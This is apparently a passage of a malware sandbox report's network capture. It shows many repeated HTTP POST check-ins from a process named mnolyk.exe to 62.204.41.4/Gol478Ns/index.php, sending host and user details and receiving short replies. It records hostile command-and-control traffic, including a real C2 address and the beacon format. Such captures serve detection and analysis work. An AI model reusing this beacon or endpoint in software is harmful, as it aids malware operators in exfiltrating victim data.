                                                                      Feb 7, 2023 23:09:35.762538910 CET | 683 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:35.826868057 CET | 683 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      569 | 192.168.2.7 | 50264 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:35.995836020 CET | 684 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:36.062863111 CET | 684 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      57 | 192.168.2.7 | 49752 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:15.374109983 CET | 172 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:15.436098099 CET | 172 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      570 | 192.168.2.7 | 50265 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:36.236424923 CET | 685 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:36.301420927 CET | 685 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      571 | 192.168.2.7 | 50266 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:36.481026888 CET | 686 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:36.545967102 CET | 686 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      572 | 192.168.2.7 | 50267 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:36.717040062 CET | 687 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:36.778573036 CET | 687 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      573 | 192.168.2.7 | 50268 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:36.981445074 CET | 688 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:37.047588110 CET | 688 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      574 | 192.168.2.7 | 50269 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:37.221379995 CET | 689 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:37.286880016 CET | 689 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      575 | 192.168.2.7 | 50270 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:37.475503922 CET | 690 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:37.542831898 CET | 690 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      576 | 192.168.2.7 | 50271 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:37.717474937 CET | 691 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:37.782658100 CET | 691 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      577 | 192.168.2.7 | 50272 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:37.970566034 CET | 692 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:38.039640903 CET | 692 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      578 | 192.168.2.7 | 50273 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:38.220730066 CET | 693 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:38.284318924 CET | 693 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      579 | 192.168.2.7 | 50274 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:38.463285923 CET | 694 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:38.525685072 CET | 694 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      58 | 192.168.2.7 | 49753 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:15.610893011 CET | 173 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:15.676393032 CET | 173 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      580 | 192.168.2.7 | 50275 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:38.709285021 CET | 695 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:38.773197889 CET | 695 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      581 | 192.168.2.7 | 50276 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:38.947586060 CET | 696 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:39.010864973 CET | 696 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      582 | 192.168.2.7 | 50277 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:39.183923960 CET | 697 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:39.246810913 CET | 697 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      583 | 192.168.2.7 | 50278 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:39.423463106 CET | 698 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:39.487081051 CET | 698 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 584 | Source IP: 192.168.2.7 | Source Port: 50279 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:39.671695948 CET | 699 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:39.735544920 CET | 699 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
